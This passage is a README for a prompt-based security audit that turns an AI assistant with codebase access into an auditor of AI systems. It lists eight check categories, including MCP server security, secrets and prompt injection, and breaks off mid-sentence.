ai-security-skill

A prompt-based security audit for AI systems. Copy it, paste it into any AI assistant with codebase access, and get a structured vulnerability report in minutes.

Most AI systems ship with zero security review. MCP servers running unrestricted shell access. API keys hardcoded in config files committed to git. Agent prompts with no injection defenses. The AI ecosystem is moving fast, but security tooling hasn't caught up -- and most teams don't even know what to check.

A comprehensive security audit prompt. Not a CLI tool. Not a SaaS product. Just a well-structured prompt that turns any AI assistant (Claude, GPT, Gemini, or anything with codebase access) into a security auditor.

You give it access to your project, it systematically reads your files, and it produces a detailed report with specific findings, evidence, and remediation steps.

The audit covers 8 categories across ~30 individual checks:

| Category | What It Looks For | |----------|-------------------| | MCP Server Security | Transport security, tool exposure, input validation, secret handling, trust boundaries | | Agent & Prompt Security | Prompt injection resistance, system prompt leakage, agent boundary enforcement, instruction hierarchy | | Secret & Credential Management | Hardcoded secrets, env variable hygiene, secret scope, logging exposure | | Data Flow & Privacy | Data sent to LLM providers, retention policies, output validation, context window risks | | LLM API Configuration | Rate limiting, cost controls, model access restrictions, error handling | | Permission & Access Control | File system access, network access, destructive operations, least privilege | | Supply Chain & Dependencies | Third-party MCP servers, dependency vulnerabilities, model supply chain | | Output Security | Code execution risks, injection attacks, file write safety |

Every finding includes a risk level (Critical / H